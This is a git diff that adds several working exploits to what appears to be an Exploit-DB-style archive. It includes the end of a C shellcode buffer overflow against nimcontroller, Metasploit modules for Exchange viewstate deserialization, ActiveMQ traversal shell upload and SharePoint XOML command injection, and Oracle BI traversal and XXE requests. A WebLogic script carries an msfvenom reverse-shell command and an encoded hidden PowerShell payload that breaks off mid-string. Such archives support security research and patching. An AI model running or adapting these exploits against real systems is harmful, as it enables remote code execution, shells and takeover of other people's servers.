+  memcpy(buffer+c, "VirtualProtect\x00", 15);
+  c += 15;
+
+  /* NOPS */
+  memset(buffer+c, 0x90, 500);
+  c += 500;
+
+  /* shellcode */
+  memcpy(buffer+c, shellcode, (sizeof(shellcode)-1));
+  c += (sizeof(shellcode)-1);
+
+  /* filler */
+  memset(buffer+c, 0x10, (8000 - c));
+
+  return buffer;
+}
+
+#define MAX_ARGUMENTS 5
+
+void help()
+{
+  printf("usage: ./singAboutMeImDyingOfThirst [-h] [-t TARGET] [-p PORT] [ARG=VAL]\n\n");
+  printf("Sing About Me Im Dying Of Thirst - A nimcontroller's worst nightmare\n\n");
+  printf("optional arguments:\n");
+  printf("  -h, --help                  show this help message and exit\n");
+  printf("  -t TARGET, --target TARGET  target host to probe\n");
+  printf("  -p PORT, --port PORT        nimcontroller port\n\n");
+  printf("examples:\n");
+  printf("  ./singAboutMeImDyingOfThirst -t 192.168.88.130 -p 48000\n");
+  exit(0);
+}
+
+int main(int argc, char **argv)
+{
+  int c;
+  int sock;
+  int rport;
+  NimsoftProbe *probe;
+  struct sockaddr_in srv;
+  char *rhost, *port;
+  char *params[MAX_ARGUMENTS];
+  unsigned char *exploit_buff;
+  unsigned char buffer[MAX_EXPLOIT_BUFFER];
+  unsigned char final_buffer[MAX_EXPLOIT_BUFFER] = "directory=";
+
+  char *exploit[] = { "directory_list", final_buffer };
+
+  while (1)
+  {
+    static struct option long_options[] =
+    {
+      {"help",    no_argument,        0, 'h'},
+      {"target",  required_argument,  0, 't'},
+      {"port",    required_argument,  0, 'p'},
+      {0, 0, 0}
+    };
+
+    int option_index = 0;
+
+    c = getopt_long (argc, argv, "ht:p:", long_options, &option_index);
+
+    if (c == -1)
+      break;
+
+    switch(c)
+    {
+      case 't':
+        rhost = optarg;
+        break;
+      case 'p':
+        port = optarg;
+        break;
+      case 'h':
+      default:
+        help();
+        break;
+    }
+  }
+
+  if (argc < 5)
+    help();
+
+  rport = atoi(port);
+
+  if (check_version(rhost, rport) != 0) {
+    printf("%s Failed to connect to target host\n", PE);
+    exit(-1);
+  }
+
+  if (check_vulnerability(rhost, rport) != 0) {
+    printf("%s Target failed vulnerability tests\n", PE);
+    exit(-1);
+  }
+
+  printf("%s Generating evil nimbus probe, we're watching\n", PI);
+  exploit_buff = generate_exploit_buffer(buffer);
+  memcpy(final_buffer+10, exploit_buff, 8000);
+  probe = packet_gen(exploit, 2, 8000);
+
+  printf("%s Sending evil buffer, R.I.P RIP - wetw0rk\n", PG);
+
+  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
+    return -1;
+
+  srv.sin_addr.s_addr = inet_addr(rhost);
+  srv.sin_port = htons(rport);
+  srv.sin_family = AF_INET;
+
+  if (connect(sock , (struct sockaddr *)&srv, sizeof(srv)) < 0)
+    return -1;
+
+  send(sock, probe->packet, probe->length, 0);
+
+  free(probe);
+  close(sock);
+}
\ No newline at end of file
diff --git a/exploits/windows/remote/48168.rb b/exploits/windows/remote/48168.rb
new file mode 100755
index 000000000..30a4cb080
--- /dev/null
+++ b/exploits/windows/remote/48168.rb
@@ -0,0 +1,180 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'bindata'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  # include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'
+  VALIDATION_KEY = "\xcb\x27\x21\xab\xda\xf8\xe9\xdc\x51\x6d\x62\x1d\x8b\x8b\xf1\x3a\x2c\x9e\x86\x89\xa2\x53\x03\xbf"
+
+  def initialize(info = {})
+    super(update_info(info,
+        'Name'           => 'Exchange Control Panel Viewstate Deserialization',
+        'Description'    => %q{
+          This module exploits a .NET serialization vulnerability in the
+          Exchange Control Panel (ECP) web page. The vulnerability is due to
+          Microsoft Exchange Server not randomizing the keys on a
+          per-installation basis resulting in them using the same validationKey
+          and decryptionKey values. With knowledge of these, values an attacker
+          can craft a special viewstate to cause an OS command to be executed
+          by NT_AUTHORITY\SYSTEM using .NET deserialization.
+        },
+        'Author'         => 'Spencer McIntyre',
+        'License'        => MSF_LICENSE,
+        'References'     => [
+            ['CVE', '2020-0688'],
+            ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],
+        ],
+        'Platform'       => 'win',
+        'Targets'        =>
+          [
+            [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],
+            [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],
+            [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]
+          ],
+        'DefaultOptions' =>
+          {
+            'SSL' => true
+          },
+        'DefaultTarget'  => 1,
+        'DisclosureDate' => '2020-02-11',
+        'Notes'          =>
+          {
+            'Stability'   => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+            'Reliability' => [ REPEATABLE_SESSION, ],
+          }
+        ))
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+
+    register_advanced_options([
+      OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),
+    ])
+  end
+
+  def check
+    state = get_request_setup
+    viewstate = state[:viewstate]
+    return CheckCode::Unknown if viewstate.nil?
+
+    viewstate = Rex::Text.decode_base64(viewstate)
+    body = viewstate[0...-20]
+    signature = viewstate[-20..-1]
+
+    unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature
+      return CheckCode::Safe
+    end
+
+    # we've validated the signature matches based on the data we have and thus
+    # proven that we are capable of signing a viewstate ourselves
+    CheckCode::Vulnerable
+  end
+
+  def generate_viewstate(generator, session_id, cmd)
+    viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)
+    signature = generate_viewstate_signature(generator, session_id, viewstate)
+    Rex::Text.encode_base64(viewstate + signature)
+  end
+
+  def generate_viewstate_signature(generator, session_id, viewstate)
+    mac_key_bytes  = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')
+    mac_key_bytes << Rex::Text.to_unicode(session_id)
+    OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)
+  end
+
+  def exploit
+    state = get_request_setup
+
+    # the major limit is the max length of a GET request, the command will be
+    # XML escaped and then base64 encoded which both increase the size
+    if target.arch.first == ARCH_CMD
+      execute_command(payload.encoded, opts={state: state})
+    else
+      cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first
+      execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})
+    end
+  end
+
+  def execute_command(cmd, opts)
+    state = opts[:state]
+    viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)
+    5.times do |iteration|
+      # this request *must* be a GET request, can't use POST to use a larger viewstate
+      send_request_cgi({
+        'uri'      => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),
+        'cookie'   => state[:cookies].join(''),
+        'agent'    => state[:user_agent],
+        'vars_get' => {
+          '__VIEWSTATE'          => viewstate,
+          '__VIEWSTATEGENERATOR' => state[:viewstate_generator]
+        }
+      })
+      break
+    rescue Rex::ConnectionError, Errno::ECONNRESET => e
+      vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')
+      sleep iteration
+    end
+  end
+
+  def get_request_setup
+    # need to use a newer default user-agent than what Metasploit currently provides
+    # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string
+    user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'
+    res = send_request_cgi({
+      'uri'           => normalize_uri(target_uri.path, 'owa', 'auth.owa'),
+      'method'        => 'POST',
+      'agent'         => user_agent,
+      'vars_post'     => {
+        'password'    => datastore['PASSWORD'],
+        'flags'       => '4',
+        'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),
+        'username'    => datastore['USERNAME']
+      }
+    })
+    fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?
+    cookies = [res.get_cookies]
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),
+      'cookie' => res.get_cookies,
+      'agent'  => user_agent
+    })
+    fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200
+    cookies << res.get_cookies
+
+    viewstate_generator = res.body.scan(/id="__VIEWSTATEGENERATOR"\s+value="([a-fA-F0-9]{8})"/).flatten[0]
+    if viewstate_generator.nil?
+      print_warning("Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}")
+      viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR
+    else
+      vprint_status("Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}")
+    end
+
+    viewstate = res.body.scan(/id="__VIEWSTATE"\s+value="([a-zA-Z0-9\+\/]+={0,2})"/).flatten[0]
+    if viewstate.nil?
+      vprint_warning('Failed to find the __VIEWSTATE value')
+    end
+
+    session_id = res.get_cookies.scan(/ASP\.NET_SessionId=([\w\-]+);/).flatten[0]
+    if session_id.nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')
+    end
+    vprint_status("Recovered the ASP.NET_SessionID: #{session_id}")
+
+    {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/48181.rb b/exploits/windows/remote/48181.rb
new file mode 100755
index 000000000..88a704c36
--- /dev/null
+++ b/exploits/windows/remote/48181.rb
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache
+        ActiveMQ 5.x before 5.11.2 for Windows.
+
+        The module tries to upload a JSP payload to the /admin directory via the traversal
+        path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ
+        credentials admin:admin (or other credentials provided by the user). It then issues
+        an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the
+        payload and obtain a shell.
+      },
+      'Author'          =>
+        [
+          'David Jorm',     # Discovery and exploit
+          'Erik Wynter'     # @wyntererik - Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-1830' ],
+          [ 'EDB', '40857'],
+          [ 'URL', 'https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt' ]
+        ],
+      'Privileged'     => false,
+      'Platform'    => %w{ win },
+      'Targets'     =>
+        [
+          [ 'Windows Java',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'win'
+            }
+          ],
+        ],
+      'DisclosureDate' => '2015-08-19',
+      'License'        => MSF_LICENSE,
+      'DefaultOptions'  => {
+        'RPORT' => 8161,
+        'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+      'DefaultTarget'  => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+      OptString.new('PATH',      [true, 'Traversal path', '/fileserver/..\\admin\\']),
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
+    ])
+  end
+
+  def check
+    print_status("Running check...")
+    testfile = Rex::Text::rand_text_alpha(10)
+    testcontent = Rex::Text::rand_text_alpha(10)
+
+    send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        },
+      'method'    => 'PUT',
+      'data'      => "<% out.println(\"#{testcontent}\");%>"
+    })
+
+    res1 = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        },
+      'method'    => 'GET'
+    })
+
+    if res1 && res1.body.include?(testcontent)
+      send_request_cgi(
+        opts = {
+          'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
+          'headers'     => {
+            'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+            },
+          'method'    => 'DELETE'
+        },
+        timeout = 1
+      )
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("Uploading payload...")
+    testfile = Rex::Text::rand_text_alpha(10)
+    vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testfile}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.
+
+    send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, datastore['PATH'], "#{testfile}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+        },
+      'method'    => 'PUT',
+      'data'      => payload.encoded
+    })
+
+    print_status("Payload sent. Attempting to execute the payload.")
+    res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path,"admin/#{testfile}.jsp"),
+      'headers'     => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      },
+      'method'    => 'GET'
+    })
+    if res && res.code == 200
+      print_good("Payload executed!")
+    else
+      fail_with(Failure::PayloadFailed, "Failed to execute the payload")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/48275.rb b/exploits/windows/remote/48275.rb
new file mode 100755
index 000000000..7757260ac
--- /dev/null
+++ b/exploits/windows/remote/48275.rb
@@ -0,0 +1,142 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'SharePoint Workflows XOML Injection',
+      'Description' => %q{
+        This module exploits a vulnerability within SharePoint and its .NET backend
+        that allows an attacker to execute commands using specially crafted XOML data
+        sent to SharePoint via the Workflows functionality.
+      },
+      'Author' => [
+        'Spencer McIntyre',
+        'Soroush Dalili'
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2020-0646'],
+        ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
+      ],
+      'Platform' => 'win',
+      'Targets' => [
+        [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
+        [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
+        [ 'Windows Powershell',
+          'Arch'         => [ARCH_X86, ARCH_X64],
+          'Type'         => :windows_powershell
+        ]
+      ],
+      'DefaultOptions' => {
+        'RPORT' => 443,
+        'SSL'   => true
+      },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => '2020-03-02',
+      'Notes' =>
+      {
+        'Stability'   => [CRASH_SAFE,],
+        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION],
+      },
+      'Privileged' => true
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
+      OptString.new('DOMAIN',    [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
+      OptString.new('USERNAME',  [ true, 'Username to authenticate as', '' ]),
+      OptString.new('PASSWORD',  [ true, 'The password to authenticate with' ])
+    ])
+  end
+
+  def check
+    res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
+    return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200
+
+    compiler_errors = extract_compiler_errors(res)
+    return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0
+
+    # once patched you get a specific compiler error message about the type name
+    return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/
+
+    CheckCode::Vulnerable
+  end
+
+  def extract_compiler_errors(res)
+    return nil unless res&.code == 200
+
+    xml_doc = res.get_xml_document
+    result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
+    return nil if result.length == 0
+
+    xml_result = Nokogiri::XML(result)
+    xml_result.xpath('//CompilerError/@Text')
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded)
+    when :windows_dropper
+      cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
+      execute_cmdstager({linemax: cmd_target.opts['Space']})
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
+    end
+  end
+
+  def escape_command(cmd)
+    # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
+    cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
+  end
+
+  def execute_command(cmd, opts = {})
+    xoml_data = <<-EOS
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
+      <workflowMarkupText>
+        <![CDATA[
+          <SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
+            <CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
+          </SequentialWorkflowActivity>
+        ]]>
+      </workflowMarkupText>
+      <rulesText></rulesText>
+      <configBlob></configBlob>
+      <flag>2</flag>
+    </ValidateWorkflowMarkupAndCreateSupportObjects>
+  </soap:Body>
+</soap:Envelope>
+    EOS
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
+      'ctype'    => 'text/xml; charset=utf-8',
+      'data'     => xoml_data,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+
+    unless res&.code == 200
+      print_error('Non-200 HTTP response received while trying to execute the command')
+    end
+
+    res
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/webapps/46728.txt b/exploits/windows/webapps/46728.txt
new file mode 100644
index 000000000..45e62a085
--- /dev/null
+++ b/exploits/windows/webapps/46728.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Directory traversal in Oracle Business Intelligence
+# Date: 16.04.19
+# Exploit Author: @vah_13
+# Vendor Homepage: http://oracle.com
+# Software Link:
+https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
+# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
+# Tested on: Windows
+# CVE : CVE-2019-2588
+
+PoC
+
+http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
\ No newline at end of file
diff --git a/exploits/windows/webapps/46729.txt b/exploits/windows/webapps/46729.txt
new file mode 100644
index 000000000..a24557ee9
--- /dev/null
+++ b/exploits/windows/webapps/46729.txt
@@ -0,0 +1,22 @@
+# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
+# Date: 16.04.19
+# Exploit Author: @vah_13
+# Vendor Homepage: http://oracle.com
+# Software Link:
+https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
+# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
+# Tested on: Windows
+# CVE : CVE-2019-2616 (7.2/10)
+
+PoC:
+
+POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
+Host: host
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
+Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Content-Length: 76
+Content-Type: text/xml; charset=UTF-8
+
+<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123>
+">
\ No newline at end of file
diff --git a/exploits/windows/webapps/46780.py b/exploits/windows/webapps/46780.py
new file mode 100755
index 000000000..9747f2a2c
--- /dev/null
+++ b/exploits/windows/webapps/46780.py
@@ -0,0 +1,55 @@
+#!/usr/bin/python
+
+# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
+# Date: 30/04/2019
+# Exploit Author: Avinash Kumar Thapa
+# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
+# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
+# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
+# Tested on:
+	#OS: Windows 2012 R2 (Build 9600).
+	#Architecture    : x64
+	#System Language : en_US
+
+
+# CVE : CVE-2019-2725
+
+
+# Script Usage:
+# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
+# Add the powershell command in the variable
+
+__author__ = "Avinash Kumar Thapa"
+__description__ = """
+Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server
+
+CREDIT STATEMENT:
+The following people or organizations reported security vulnerabilities addressed by this Security Alert to Oracle:
+
+Badcode of Knownsec 404 Team: CVE-2019-2725
+Hongwei Pan of Minsheng Banking Corp.: CVE-2019-2725
+Liao Xinxi of NSFOCUS Security Team: CVE-2019-2725
+Lin Zheng of Minsheng Banking Corp.: CVE-2019-2725
+Song Keya of Minsheng Banking Corp.: CVE-2019-2725
+Tianlei Li of Minsheng Banking Corp.: CVE-2019-2725
+ZengShuai Hao: CVE-2019-2725
+Zhiyi Zhang of 360 ESG Codesafe Team: CVE-2019-2725
+
+"""
+
+import requests
+import sys
+
+print "Exploit Written by Avinash Kumar Thapa"
+
+
+exploit = "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARABQAFcAeAAxAHcAQwBBADcAVgBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAagA5AEQAMQBhAEYAWgBGAHMAaABHAEIATABhAE4ASgBFAHEAMwBaAHAAWABVADUAeQBZAE8AQgBBAEkAaAAwADQAYgBlADIAMgBXAHIATAAzAEUAWABoAE8AZwAxAC8AOQArAHMAMgBDAG4ANgBUAFcAdAAyAHAAUABPADQAbQBWAGYAWgBtAFoAbgBuAG4AbABtADEAawBFAFcAZQA0AEwAeQBXAEYAawBzAHUAZgBMADUAegBlAEcAQgBnAHgATQBjAEsAVgBvAHAAYQBrADMASwBTAG0AbgBWAGEANQArAG0AKwBzAEUAQgBiAEoAUgBXAFYAawBmADUAcQBHAGgAVAB0AEYAdwAyAGUAWQBSAHAAUABMAHUANABhAEcAUgBKAFEAbQBLAHgAbgAxAGMANgBSAEsAQQAwAEoAZABFADkAbwB5AFQAVgBkAE8AVgB2ADUAWABaAE8ARQBuAEoAOABkAGIAOABnAG4AbABBACsASwA2AFcALwBLAGgAMwBHADcAegBIAEwAeABUAFkATgA3AE0AMgBKAGMAbwB4AGkAWAArADcAMQB1AFkAZQBsAE0AeABWADMAeQBhAGoAUQAxAEQALwAvAFYAUABYAHAAYwBXADEAVwBhAFQAMQBtAG0ASwBXAGEANgBtADUAUwBRAGEASwBLAHoANQBpAHEASwAxADkAMABlAGUARABOAFoAawBrADAAMQBhAFoAZQB3AGwATQBlAGkATQBvAHQAagBVADkAUABLAHMATQA0AHgAUQBHADUAQgBHAHMAcgBZAGgATQB4ADUAMwA2AHEANgBoAEEARQBmAEIASQBpAHMAaQBSAFcAWgBEAGgAUwBmADcAKwByAHEAVABCADAARQB1ADQAaAAzADAAOQBJAG0AcQBwAGwAWgBTAG8AdABUADIAZQB6AFAANwBSAHAAZgB1AHgAMQBGAGcAcwBhAGsAWQBvAFYAQwA1AEwAdwBwAFUAdQBTAEYAZgBWAEkAVwB1AG4AaQAyAEcAZgBrAG0AZwBRAHoAMABIAEoARgBRAHUATgB3AHAAdQBzAGcAdAB1AEkAUABSAEMAdgBGAEcAVwBOAGwANQBYAGYATQBhAEoAZgBrAHEAUQBEAHQAVgA1AFcAMABsADAAbwBnADUAWQBoAEUATAAwAE0AZQB2AHcALwBUADUAbgA3AEcAeQBGADUAUgBmAGMAVgBQAG0AWABvAGQAbgB1AGYAMABBADMAQgBmADMAaAB5ACsATwBRAHcASwByAHAARAB6AGwAMQBTAEIAMABjAEYAMABOAHkAYgBnAG0AKwBiAHcAbABPADYAawBQAGkAcgBWAHMAbQBMAEQATQBWAGoAdwBaAEEAUABUADAAawAyAFMARQBYADMAMgBqAEsAeABTAFMAcwBmAE4AKwAvAEsAUAA5AFcAdQBGAE0ASQBnAFMAdgB3ADgAcgAwAHgARwBuAC8AZwB3ADAAOABtAFMAVwA4AEwAZwBwAGwAMwAvAE0AeQBTAFkASgBhAEUAeQBhAG0AeABoAEgAMQBDAHQAbwBwADcAMgBHAE0AQQBrAFkAMgBjAFYAWABLAGMAUQB1AHcAUwBWAE4AegBUAGUASQAzAHkAUwBNAGgARgBoAEkAMABHAFMAaQB2ADEATgByAFIAVgBRADgANgA1AG8AWgBaAFQANQBKAGsAQQBkAFoAUwBzAEUAcgBTAEsARAArAHIAVABQADcAUABHAGkAcQBGAGQAcwBrAEEAbwBUADIAYwAyAEIAZQBLAFEAQwB5AGsAMABJADYASgAvAGkAbQBPAEYAMwBPAFEAVQBoAHQATQBKAHkAbQBaAGMAWABKAG8ATgBxADgAcwB1AEkAUwB6AEkAaABmAFYAbABDAGMAMABuAHcATABaAFkATAB2AGgAdQBwAFgAZAArADIATQBDAGUAcgBoAFYAQgBUAG0AWgBuAG8ATwBZADMANQBjAGcAOABlAHAAUwBEAEkAUABjAGcAYQBoADMANwBoAEwANABsAEgATQBKAEIASgBsAHAAVQB0ADkAWQBtADUAYwBHAGgAYgBIAHEAcQAvAGkAMABNAEMATQBRAFEAMgBBAHAAUgBYAGsAQQBWAFoAawAvAEsANgBRAFQARQBqAEEAdwAxADMAVwA5AFkAcABMAGgAQgBVAHQARwBZAGwAQQBaAGwAZgAxAGIAWQBaAEQAcQBQAEcAYwA2AFQAdgBxADQASgBEADQANgByADgAYwBMAEoAaQA4AHAANgAxAEUAbwBvAEQAZwBoAFgAdQB